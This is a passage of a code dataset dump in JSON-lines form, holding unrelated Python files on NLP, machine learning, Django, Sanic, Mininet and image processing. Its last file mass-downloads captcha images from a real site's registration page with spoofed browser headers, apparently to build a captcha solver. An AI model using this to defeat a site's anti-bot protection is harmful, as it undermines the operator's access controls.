context):\n end = len(sentence.pairs) - 1 \n index = 0\n\n while index < end:\n first, index = self.gettext(sentence, index, context)\n \n if first is None:\n continue\n\n if index >= end:\n break\n\n second, index2 = self.gettext(sentence, index, context, True)\n\n if second is None:\n continue\n\n bigramTxt = ' '.join([second,first])\n\n bigram = context.getcollocation(bigramTxt)\n if bigram is None:\n bigram = sm.CollocationHead([second,first])\n context.addcollocation(bigram)\n bigram.freq()\n\n if index < end :\n second2, index2 = self.gettext(sentence, index, context)\n if index2 >= end:\n break\n\n third, _ = self.gettext(sentence, index2, context, True)\n\n if third is None:\n continue\n \n trigramTxt = ' '.join([third,second2,first])\n\n trigram = context.getcollocation(trigramTxt)\n if trigram is None:\n trigram = sm.CollocationHead([third,second2,first])\n context.addcollocation(trigram)\n trigram.freq()\n return sentence\n\n\n def gettext(self, sentence, index, context, islast=False):\n pair = sentence.pairs[index]\n\n if type(pair) is sm.Sentence :\n self.resolveSentence(pair, context)\n return str(pair), index +1\n elif type(pair) is sm.Quote :\n if(pair.quotetype == sm.QUOTE_TYPE_EQUIV):\n return str(pair.text) , index+1\n else:\n return None, index+1\n else:\n if islast :\n return pair.head.text, index+1\n else:\n return str(pair.text) , index+1\n","sub_path":"pycor/res/collocresolver.py","file_name":"collocresolver.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532740367","text":"import sys\nsys.path.append('../py')\n\nfrom iroha import *\nfrom iroha.iroha import *\n\nd = IDesign()\nmod_top = IModule(d, \"M_top\")\ntab_top = ITable(mod_top)\nst1_top = IState(tab_top)\n\nmod_sub = IModule(d, \"M_sub\")\nmod_sub.parent_module = mod_top\ntab_sub = ITable(mod_sub)\n\ndesign_tool.ValidateIds(d)\n\nw = DesignWriter(d)\nw.Write()\n","sub_path":"examples/sub_module.py","file_name":"sub_module.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307326528","text":"import numpy as np\nfrom scipy import spatial\nimport bookingreview\nimport preprocessreview\nfrom pydblite import Base\n\n\nclass ReviewNode:\n def __init__(self, data, prev=None, next=None):\n self.data = data\n self.prev = prev\n self.next = next\n \n def get(self):\n return self.data\n \n def set(self, val):\n self.data = val\n \n def previous_node(self, num = 1):\n if(num == 0):\n return self\n \n return self.prev.previous_node(num-1)\n\n def __str__(self): \n return \"ReviewNode - \"+self.data.__str__() + '\\n'\n \n \nclass LinkedList:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def set_root(self, val):\n self.root = ReviewNode(val)\n self.root.prev = self.root\n self.root.next = self.root\n self.size = 1\n\n def insert_after(self, val, prev):\n if (prev is None) or self.size == 0:\n self.set_root(val)\n \n else:\n inserted = ReviewNode(val, prev, prev.next)\n prev.next.prev = inserted\n prev.next = inserted\n self.size += 1\n \n def insert_tail(self, val):\n if self.size == 0:\n self.set_root(val)\n else:\n self.insert_after(val, self.root.prev)\n\n def to_list(self, get_node = False):\n if self.root is None:\n return []\n \n if get_node: ret = [self.root]\n else: ret = [self.root.data]\n \n temp = self.root.next\n for i in range(1, self.size):\n if get_node: ret.append(temp)\n else: 
ret.append(temp.data)\n temp = temp.next\n \n return ret\n\n @classmethod\n def list_to_linked(cls, arg):\n ret = LinkedList()\n for val in arg:\n ret.insert_tail(val)\n \n return ret\n \n \n def __str__(self):\n if self.root is None:\n return \"empty\"\n \n string = self.root.__str__()+ '\\n'\n temp = self.root.next\n while (temp is not self.root):\n string = string + temp.__str__() + '\\n'\n temp = temp.next\n \n return string\n\n\nclass ReviewDB(object):\n def __init__(self, name):\n self.review_db = Base(name + \"_DB.pdl\")\n self.review_dict = {}\n \n if self.review_db.exists():\n self.review_db.open()\n self.set_review_dict(self.review_db[0]['review_list'])\n \n else:\n self.review_db.create('review_list', 'id_dict')\n self.review_db.insert([], {})\n self.save_db()\n \n def set_review_dict(self, review_list):\n self.review_dict = {}\n linked_list = LinkedList.list_to_linked(review_list)\n for review_node in linked_list.to_list(get_node = True):\n self.review_dict[review_node.data.review_id] = review_node\n \n def add_review_list(self, bookingReview_list):\n temp_list = list()\n for review in bookingReview_list:\n if not (review.review_id in self.review_dict):\n temp_list.append(review)\n \n temp_list.sort()\n prev_list = self.review_db[0]['review_list']\n \n from heapq import merge\n merged_list = list(merge(temp_list, prev_list))\n self.review_db[0]['review_list'] = merged_list\n \n self.set_review_dict(merged_list)\n \n \n self.review_db.commit()\n \n '''\n def add_review(self, bookingReview):\n if not (bookingReview.review_id in self.review_db[0]['review_dict']):\n self.review_db[0]['review_dict'][bookingReview.review_id] = bookingReview\n self.review_db[0]['tree'].insert(bookingReview) \n \n self.save_db()\n '''\n \n def get_review_node(self, review_id):\n if (review_id in self.review_dict):\n return self.review_dict[review_id]\n \n def get_id_spamRecord (self, id):\n id_dict = self.review_db[0]['id_dict']\n if (id in id_dict):\n return (id_dict[id][0]/id_dict[id][1])\n else:\n return 0.0\n \n def add_spam_result (self, id, result):\n id_dict = self.review_db[0]['id_dict']\n accumulate = 0\n if result:\n accumulate = 1\n \n if (id in id_dict):\n id_dict[id][0] += accumulate\n id_dict[id][1] += 1\n else:\n id_dict[id] = [accumulate, 1]\n \n def save_db(self):\n self.review_db.commit()\n \n def size(self):\n return len(self.review_db[0]['review_list'])\n \n def __str__(self):\n return \"reviewDB __str__ : unimplemented\"\n\n\nclass FormattedReview(object):\n reviewDB = None\n attribute_num = 7\n def __init__(self, preprocessReview):\n \n self.label = preprocessReview.label\n self.review_id = preprocessReview.review_id\n \n self.bookingReview = FormattedReview.reviewDB.get_review_node(self.review_id).data\n \n self.context = preprocessReview.context_word2vec\n self.context_bayes = preprocessReview.context_postag\n self.calc_comp_similarity(preprocessReview)\n \n if preprocessReview.rate == 0:\n self.rate = 1.0\n else:\n self.rate = preprocessReview.rate / 10\n \n self.reiteration_context = self.calc_reiteration_context()\n self.reiteration_repeat = self.calc_reiteration_repeat()\n self.post_time = preprocessReview.post_time % 1\n self.post_vip = (int(preprocessReview.post_time) % 7) / 7\n \n self.id = self.reviewDB.get_id_spamRecord(preprocessReview.id)\n self.reviewDB.add_spam_result(preprocessReview.id, self.label)\n \n def calc_comp_similarity(self, preprocessReview):\n max_sim = -1;\n for company_vec in preprocessReview.company_word2vec:\n for context_vec in 
preprocessReview.context_word2vec:\n cos_sim = 1 - spatial.distance.cosine(company_vec, context_vec)\n max_sim = max_sim if (max_sim > cos_sim) else cos_sim\n \n self.comp_similarity = max_sim\n \n def calc_reiteration_context(self, num = 1):\n if num > 10: # reiteration_context 최대 수치는 1\n return 0\n \n prev_review_node = FormattedReview.reviewDB.get_review_node(self.review_id).previous_node(num)\n if prev_review_node is None:\n return 0\n\n prev_review = prev_review_node.data\n \n if(prev_review.id == self.bookingReview.id #리뷰어 동일\n and prev_review.context == self.bookingReview.context #텍스트 내용 동일\n and self.bookingReview.post_time - prev_review.post_time < 30): #한달 이내 작성\n return 0.1 + self.calc_reiteration_context(num+1)\n \n else:\n return 0\n \n \n def calc_reiteration_repeat(self, num = 1): \n prev_review_node = FormattedReview.reviewDB.get_review_node(self.review_id).previous_node(num)\n if prev_review_node is None:\n return 0\n\n prev_review = prev_review_node.data\n \n if(prev_review.company == self.bookingReview.company #업체명 동일\n and prev_review.id == self.bookingReview.id): #리뷰어 동일\n \n time_diff = self.bookingReview.post_time - prev_review.post_time\n \n if(time_diff < 1): #하루 이내 작성\n val = 0.1+self.calc_reiteration_repeat(num+1)\n \n elif(time_diff < 365): #1년 이내 작성\n val = 0.1*(365-time_diff)/365+self.calc_reiteration_repeat(num+1)\n \n else:\n val = 0.0\n \n return val if val<1.0 else 1.0\n \n else:\n return 0\n\n def get_attribute(self):\n return np.array([self.comp_similarity, self.rate, self.reiteration_context,\n self.reiteration_repeat, self.post_time, self.post_vip, self.id])\n \n @classmethod \n def setDB(self, reviewDB):\n self.reviewDB = reviewDB\n \n def __str__(self):\n return (\"FormattedReview object {0}:\\n\"\n \" context = \\n{1}\\n\"\n \" context_bayes = \\n{9}\\n\"\n \" comp_similarity = {2}\\n\"\n \" rate = {3}\\n\"\n \" reiteration_context = {4}\\n\"\n \" reiteration_repeat = {5}\\n\"\n \" post_time = {6}\\n\"\n \" post_vip = {7}\\n\"\n \" label = {8}\\n\"\n .format(self.review_id, self.context, self.comp_similarity,\n self.rate, self.reiteration_context, self.reiteration_repeat,\n self.post_time, self.post_vip, self.label, self.context_bayes))\n","sub_path":"Preprocessor/format_module.py","file_name":"format_module.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198547243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 19:53:05 2020\n\n@author: Lindsay Turner\n\nRandom Forest Model \n\"\"\"\n\n##############################################################################\n# IMPORT PACKAGES\n##############################################################################\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport time\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.inspection import permutation_importance\nfrom sklearn.metrics import plot_confusion_matrix\n\n##############################################################################\n# FUNCTIONS\n##############################################################################\n\ndef nre_fun(x, y):\n nre = (x - y) / (x + y)\n return nre\n\n\n# Takes a portion of samples from each class\n# Note: this code is slow and needs revision\ndef undersample_ds(x, 
classCol, nsamples_class, seed):\n for i in np.unique(x[classCol]):\n if (sum(x[classCol] == i) - nsamples_class != 0): \n xMatch = x[(x[classCol]).str.match(i)]\n x = x.drop(xMatch.sample(n = len(xMatch) - nsamples_class,\n random_state = seed).index)\n return x\n\n\n# changes Classnames into integers representing each class\ndef string_to_int(y):\n new_y = y.copy()\n unique_y = np.unique(new_y)\n new_y = new_y.to_numpy()\n for i in range(len(new_y)):\n for j in range(len(unique_y)):\n if(new_y[i] == unique_y[j]):\n new_y[i] = j\n \n new_y = new_y.astype('int')\n return new_y, unique_y\n \n \n##############################################################################\n# IMPORT DATA & CREATE DATAFRAME\n##############################################################################\n\n# Read in the data file \ndfAll = pd.read_csv(r'C:/Users/linds/NOAA/rf_training/data_raw/training_data_1M_sub.csv')\n\nnsamples_class = 10000 # Number of samples to take from each class\nsample_seed = 42 # seed for random sample\n#training_bc = undersample_ds(dfAll, 'Classname', nsamples_class, sample_seed)\ntraining_bc = dfAll.groupby('Classname').apply(lambda s: s.sample(nsamples_class,\n random_state = sample_seed))\n\n# Run NRE function on the combination of indices that preformed best\ngreen_red = nre_fun(training_bc['green'], training_bc['red'])\nblue_coastal = nre_fun(training_bc['blue'], training_bc['coastal'])\nNIR2_yellow = nre_fun(training_bc['NIR2'], training_bc['yellow'])\nNIR1_red = nre_fun(training_bc['NIR1'], training_bc['red'])\nrededge_yellow = nre_fun(training_bc['rededge'], training_bc['yellow'])\nred_NIR2 = nre_fun(training_bc['red'], training_bc['NIR2'])\nrededge_NIR2 = nre_fun(training_bc['rededge'], training_bc['NIR2'])\nrededge_NIR1 = nre_fun(training_bc['rededge'], training_bc['NIR1'])\ngreen_NIR1 = nre_fun(training_bc['green'], training_bc['NIR1'])\ngreen_NIR2 = nre_fun(training_bc['green'], training_bc['NIR2'])\nrededge_green = nre_fun(training_bc['rededge'], training_bc['green'])\nrededge_red = nre_fun(training_bc['rededge'], training_bc['red'])\nyellow_NIR1 = nre_fun(training_bc['yellow'], training_bc['NIR1'])\nNIR2_blue = nre_fun(training_bc['NIR2'], training_bc['blue'])\nblue_red = nre_fun(training_bc['blue'], training_bc['red'])\n\n# Combine indices into a dataframe\nindices_df = pd.concat([green_red, blue_coastal, NIR2_yellow, NIR1_red,\n rededge_yellow, red_NIR2, rededge_NIR2,\n rededge_NIR1, green_NIR1, green_NIR2, rededge_green,\n rededge_red, yellow_NIR1, NIR2_blue, blue_red],\n axis = 1)\n\nfeature_names = ['green red', 'blue coastal', 'NIR2 yellow', 'NIR1 red',\n 'rededge yellow', 'red NIR2', 'rededge NIR2', 'rededge NIR1',\n 'green NIR1', 'green NIR2', 'rededge green', 'rededge red',\n 'yellow NIR1', 'NIR2 blue', 'blue red']\nindices_df.columns = feature_names\nindices_df = indices_df * 10000\nindices_df['Classname'] = pd.Series(training_bc['Classname'],\n index = indices_df.index)\n\n##############################################################################\n# RANDOM FOREST MODEL\n##############################################################################\n\n# X data for rf\nfeatures = indices_df\n\n# y data for rf. The y data needs to be as integers for sklearn. 
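pd.factorize below returns a pair\n# (codes, uniques); a hypothetical sketch (not part of the original script) for\n# mapping integer predictions back to class names after rf.predict:\n#   codes, uniques = pd.factorize(indices_df['Classname'])\n#   predicted_names = uniques[rf.predict(X_tst)]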
\n#labels, labels_name = string_to_int(indices_df['Classname'])\n#labels = pd.get_dummies(indices_df['Classname'])\nlabels = pd.factorize(indices_df['Classname'])[0]\n\n# Partition data into testing and training data\nX_train, X_test, y_train, y_test = train_test_split(features[feature_names],\n labels, train_size = 0.9,\n random_state = 42,\n stratify = labels)\n\nt0 = time.time()\n# random classifier \nrf = RandomForestClassifier(n_estimators = 200,\n max_features = 5,\n random_state = 8)\n\nrf.fit(X_train, y_train)\nt1 = time.time()\ntotal_time = t1-t0\n\nresult = permutation_importance(rf, X_train, y_train, random_state = 8)\n\npredictions = rf.predict(X_test)\n\naccuracy = accuracy_score(y_test, predictions)\n\nconfmat = confusion_matrix(y_test, predictions)\ndf_confmat = pd.DataFrame(confmat)\nplot_confusion_matrix(rf, X_test, y_test)\n\n\n","sub_path":"rf_training.py","file_name":"rf_training.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336152139","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(verbose_name='Имя', max_length=200)),\n ('title', models.CharField(verbose_name='Тема', max_length=200)),\n ('email', models.EmailField(max_length=254)),\n ('text', models.TextField()),\n ('data', models.DateField(default=datetime.datetime(2016, 3, 7, 23, 46, 19, 404907, tzinfo=utc))),\n ],\n options={\n 'verbose_name': 'Комментарий',\n 'verbose_name_plural': 'Комментарии',\n },\n ),\n migrations.CreateModel(\n name='firstPost',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('text', models.TextField(verbose_name='Текст')),\n ('image', models.ImageField(verbose_name='Картинка', upload_to='media')),\n ('title', models.CharField(verbose_name='Заголовок', max_length=200)),\n ],\n options={\n 'verbose_name': 'Первая запись',\n 'verbose_name_plural': 'Первые записи',\n },\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('email', models.EmailField(max_length=254)),\n ('status', models.CharField(max_length=200)),\n ('quantity', models.IntegerField(default=0)),\n ('summ', models.FloatField(default=0)),\n ('data', models.DateField(default=datetime.datetime(2016, 3, 7, 23, 46, 19, 405496, tzinfo=utc))),\n ],\n options={\n 'verbose_name': 'Заказ',\n 'verbose_name_plural': 'Заказы',\n },\n ),\n migrations.CreateModel(\n name='secondPost',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('text', models.TextField(verbose_name='Текст')),\n ('image', models.ImageField(verbose_name='Картинка', upload_to='media')),\n ('title', models.CharField(verbose_name='Заголовок', max_length=200)),\n ('link', models.CharField(verbose_name='Ссылка', max_length=200)),\n ('buttonText', models.CharField(verbose_name='Надпись на кнопке', max_length=30)),\n ],\n options={\n 'verbose_name': 'Вторая запись',\n 'verbose_name_plural': 'Вторые 
записи',\n },\n ),\n ]\n","sub_path":"magazin/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"104470175","text":"\nimport os, click\nfrom sanic import Sanic\nfrom sanic.response import json\nfrom sanic_cors import CORS, cross_origin\n\nfrom stage import add_route as stage_add_route\n\napp = None\n\ndef path_check():\n path = os.path.join(os.getcwd(), 'tmp/')\n if not os.path.exists(path):\n os.mkdir(path)\n\n@click.command()\n@click.option('--host', default='0.0.0.0', type=str)\n@click.option('--port', default=8000, type=int)\ndef run(host, port):\n path_check()\n\n global app\n app = Sanic()\n CORS(app)\n app.add_route(index, '/', methods=['GET'])\n stage_add_route(app)\n app.run(host=host, port=port)\n\nasync def index(request):\n return json({ 'success': True, 'data': 'Hello World!' })\n\nif __name__ == '__main__':\n run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"412811406","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns('',\n url(r'^signup/$', 'chain.views.signup'),\n url(r'^login/$', 'chain.views._login'),\n url(r'^logout/$', 'chain.views._logout'),\n url(r'^calendar/$', 'chain.views.calendar', name='calendar'),\n url(r'^calendar/entries/$', 'chain.views.get_entries'),\n url(r'^punch/$', 'chain.views.punch'),\n)\n\n","sub_path":"chain/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"594590771","text":"import numpy\nimport torch\n\nfrom ODEF import ODEF\nfrom mysolver import simplest_euler_ode_solver as ode_solve\n\nclass ODEAdjoint(torch.autograd.Function):\n @staticmethod\n def forward(ctx, z0, t, flat_parameters, func):\n assert isinstance(func, ODEF)\n bs, *z_shape = z0.size()\n time_len = t.size(0)\n\n with torch.no_grad():\n z = torch.zeros(time_len, bs, *z_shape).to(z0)\n z[0] = z0\n for i_t in range(time_len - 1):\n z0 = ode_solve(z0, t[i_t], t[i_t+1], func)\n z[i_t+1] = z0\n\n ctx.func = func\n ctx.save_for_backward(t, z.clone(), flat_parameters)\n return z\n\n @staticmethod\n def backward(ctx, dLdz):\n \"\"\"\n dLdz shape: time_len, batch_size, *z_shape\n \"\"\"\n func = ctx.func\n t, z, flat_parameters = ctx.saved_tensors\n time_len, bs, *z_shape = z.size()\n n_dim = numpy.prod(z_shape)\n n_params = flat_parameters.size(0)\n\n # Dynamics of augmented system to be calculated backwards in time\n def augmented_dynamics(aug_z_i, t_i):\n \"\"\"\n tensors here are temporal slices\n t_i - is tensor with size: bs, 1\n aug_z_i - is tensor with size: bs, n_dim*2 + n_params + 1\n \"\"\"\n z_i, a = aug_z_i[:, :n_dim], aug_z_i[:, n_dim:2*n_dim] # ignore parameters and time\n\n # Unflatten z and a\n z_i = z_i.view(bs, *z_shape)\n a = a.view(bs, *z_shape)\n with torch.set_grad_enabled(True):\n t_i = t_i.detach().requires_grad_(True)\n z_i = z_i.detach().requires_grad_(True)\n func_eval, adfdz, adfdt, adfdp = func.forward_with_grad(z_i, t_i, grad_outputs=a) # bs, *z_shape\n adfdz = adfdz.to(z_i) if adfdz is not None else torch.zeros(bs, *z_shape).to(z_i)\n adfdp = adfdp.to(z_i) if adfdp is not None else torch.zeros(bs, n_params).to(z_i)\n adfdt = adfdt.to(z_i) if adfdt is not None else torch.zeros(bs, 
1).to(z_i)\n\n # Flatten f and adfdz\n func_eval = func_eval.view(bs, n_dim)\n adfdz = adfdz.view(bs, n_dim)\n return torch.cat((func_eval, -adfdz, -adfdp, -adfdt), dim=1)\n\n dLdz = dLdz.view(time_len, bs, n_dim) # flatten dLdz for convenience\n with torch.no_grad():\n ## Create placeholders for output gradients\n # Prev computed backwards adjoints to be adjusted by direct gradients\n adj_z = torch.zeros(bs, n_dim).to(dLdz)\n adj_p = torch.zeros(bs, n_params).to(dLdz)\n # In contrast to z and p we need to return gradients for all times\n adj_t = torch.zeros(time_len, bs, 1).to(dLdz)\n\n for i_t in range(time_len-1, 0, -1):\n z_i = z[i_t]\n t_i = t[i_t]\n f_i = func(z_i, t_i).view(bs, n_dim)\n\n # Compute direct gradients\n dLdz_i = dLdz[i_t]\n dLdt_i = torch.bmm(torch.transpose(dLdz_i.unsqueeze(-1), 1, 2), f_i.unsqueeze(-1))[:, 0]\n\n # Adjusting adjoints with direct gradients\n adj_z += dLdz_i\n adj_t[i_t] = adj_t[i_t] - dLdt_i\n\n # Pack augmented variable\n aug_z = torch.cat((z_i.view(bs, n_dim), adj_z, torch.zeros(bs, n_params).to(z), adj_t[i_t]), dim=-1)\n\n # Solve augmented system backwards\n aug_ans = ode_solve(aug_z, t_i, t[i_t-1], augmented_dynamics)\n\n # Unpack solved backwards augmented system\n adj_z[:] = aug_ans[:, n_dim:2*n_dim]\n adj_p[:] += aug_ans[:, 2*n_dim:2*n_dim + n_params]\n adj_t[i_t-1] = aug_ans[:, 2*n_dim + n_params:]\n\n del aug_z, aug_ans\n\n ## Adjust 0 time adjoint with direct gradients\n # Compute direct gradients\n dLdz_0 = dLdz[0]\n dLdt_0 = torch.bmm(torch.transpose(dLdz_0.unsqueeze(-1), 1, 2), f_i.unsqueeze(-1))[:, 0]\n\n # Adjust adjoints\n adj_z += dLdz_0\n adj_t[0] = adj_t[0] - dLdt_0\n return adj_z.view(bs, *z_shape), adj_t, adj_p, None\n\nif __name__ == \"__main__\":\n pass","sub_path":"msurtsukov/ODEAdjoint.py","file_name":"ODEAdjoint.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"98988252","text":"\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nfrom keras import backend as K\n\n# data pre-process\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\nif K.image_data_format() == 'channels_first':\n X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)/255\n X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)/255\n input_shape = (1, 28, 28)\nelse:\n X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)/255\n X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)/255\n input_shape = (28, 28, 1)\nY_train = to_categorical(Y_train, num_classes=10)\nY_test = to_categorical(Y_test, num_classes=10)\n\n# build model\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# train\nmodel.fit(X_train, Y_train, epochs=10, batch_size=32, validation_data=(X_test, 
Y_test))\n","sub_path":"3_cnn/cnn_mnist.py","file_name":"cnn_mnist.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"48917224","text":"#!/usr/bin/python\n\nfrom mininet.net import Mininet\nfrom mininet.topo import Topo\nfrom mininet.cli import CLI\nfrom mininet.node import UserSwitch,RemoteController\nfrom mininet.term import makeTerm\nimport os, time\n\nclass MyTopo( Topo ):\n \"Simple topology example.\"\n\n def __init__( self):\n \"Create custom topo.\"\n\n # Add default members to class.\n Topo.__init__(self)\n\n # Add nodes\n \n Host1=self.addHost('h1', ip='10.0.0.1/24')\n Host2=self.addHost('h2', ip='10.0.0.2/24')\n switch1=self.addSwitch('s1')\n switch2=self.addSwitch('s2')\n switch3=self.addSwitch('s3')\n switch4=self.addSwitch('s4')\n switch5=self.addSwitch('s5')\n\n # Add edges\n self.addLink( Host1, switch1, 1, 1)\n self.addLink( switch1, switch2, 2, 1)\n self.addLink( switch1, switch3, 3, 1)\n self.addLink( switch1, switch4, 4, 1)\n self.addLink( switch2, switch5, 2, 1)\n self.addLink( switch3, switch5, 2, 2)\n self.addLink( switch4, switch5, 2, 3)\n self.addLink( switch5, Host2, 4, 1)\n\n######Starting controller\n\n\nos.system(\"xterm -e 'ryu-manager ~/ryu/ryu/app/openstate/playground/forwarding_consistency_many_to_1_alternative.py'&\")\n\n\n\n######Starting mininet\ntopos = { 'mytopo': ( lambda: MyTopo() ) }\nmytopo=MyTopo()\ntime.sleep(1)\nprint(\"\\n********************************** HELP *********************************************\")\nprint(\"Type \\\"python ~/ryu/ryu/app/openstate/echo_server.py 200\\\" in h2's xterm\")\nprint(\"Type \\\"nc 10.0.0.2 200\\\" in h1's xterm\")\nprint(\"Watching the tcpdump results, it is possible to see that forwarding consistency is guaranteed IN EACH DIRECTION.\\n\"\n \"In order to test new path selection, close and reopen netcat.\")\nprint(\"\\nTo exit type \\\"ctrl+D\\\" or exit\")\nprint(\"*************************************************************************************\")\nnet = Mininet(topo=mytopo,switch=UserSwitch,controller=RemoteController,cleanup=True,autoSetMacs=True,autoStaticArp=True,listenPort=6634)\nnet.start()\nos.system(\"xterm -e 'tcpdump -i s2-eth1'&\")\nos.system(\"xterm -e 'tcpdump -i s3-eth1'&\")\nos.system(\"xterm -e 'tcpdump -i s4-eth1'&\")\nh1,h2 = net.hosts[0], net.hosts[1]\nmakeTerm(h1)\nmakeTerm(h2)\nCLI(net)\nnet.stop()\nos.system(\"sudo mn -c\")\nos.system(\"kill -9 $(pidof -x ryu-manager)\")\n","sub_path":"ryu/app/openstate/playground/start_many_to_1_alternative.py","file_name":"start_many_to_1_alternative.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14427081","text":"import cv2\r\nimport numpy as np \r\nimport glob\r\n\r\n\r\ndef resize(image, size, interpolation): #To resize the image to a square and maintain aspect ratio\r\n height, width = image.shape[:2]\r\n c = None if len(image.shape) < 3 else image.shape[2]\r\n if height == width: return cv2.resize(image, (size, size), interpolation)\r\n if height > width: diff = height\r\n else: diff = width\r\n x_pos = int((diff - width)/2.)\r\n y_pos = int((diff - height)/2.)\r\n if c is None:\r\n mask = np.zeros((diff, diff), dtype=image.dtype)\r\n mask[y_pos:y_pos+height, x_pos:x_pos+width] = image[:height, :width]\r\n else:\r\n mask = np.zeros((diff, diff, c), dtype=image.dtype)\r\n mask[y_pos:y_pos+height, x_pos:x_pos+width, :] = image[:height, :width, 
:]\r\n return cv2.resize(mask, (size, size), interpolation)\r\n\r\n\r\n\r\ni=1\r\nfor filename in glob.glob(r\" \"):\r\n print(\"Processing %s\" % filename)\r\n inp_image = cv2.imread(filename)\r\n img = cv2.cvtColor(inp_image, cv2.COLOR_BGR2GRAY)\r\n resized = resize(inp_image,420, cv2.INTER_AREA)\r\n cv2.imwrite(r'image.{0}.png'.format(i),resized)\r\n i=i+1\r\n \r\nprint('All images resized')","sub_path":"Image_resizing_with_aspectratio.py","file_name":"Image_resizing_with_aspectratio.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"539674107","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# 데이터\nwine = pd.read_csv('ml\\data\\winequality-white.csv', sep=';', encoding = 'utf-8')\n\ncount_data = wine.groupby('quality')['quality'].count()\nprint(count_data)\n\ncount_data.plot()\nplt.savefig('ml\\wine-count-plt.png')","sub_path":"mlearn/m06_wine.py","file_name":"m06_wine.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"317080943","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author__ = 'xiaosong Liu'\n\nimport os\nimport time\nimport uuid\nimport asyncio\nimport aiohttp\nimport aiofiles\nimport cv2\nimport numpy as np\n\nsemaphore = asyncio.Semaphore(5)\n\nasync def download_images():\n dirpath = 'pic_temp'\n url = 'https://passport.lagou.com/vcode/create?from=register&refresh=1451121012510'\n filename = 'lagou-'+ str(uuid.uuid1())\n pic_save_path = os.path.join(dirpath,filename)\n headers_ = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36\",\n \"Referer\": 'https://passport.lagou.com/'\n }\n\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n async with semaphore:\n async with aiohttp.ClientSession() as session:\n async with session.get(url,headers=headers_) as html:\n try:\n pic_images = await html.read()\n except:\n print(html.status)\n if pic_images:\n f = await aiofiles.open(pic_save_path + '.bmp','wb')\n await f.write(pic_images)\n \n return True\n else:\n return False\n\n\ndef asysnc_download():\n\n start_time = time.time()\n\n loop = asyncio.get_event_loop()\n download_tasks = [download_images() for i in range(100)]\n loop.run_until_complete(asyncio.wait(download_tasks))\n loop.close()\n\n end_time = time.time()\n\n print('下载完成: 费时%.3f秒!' 
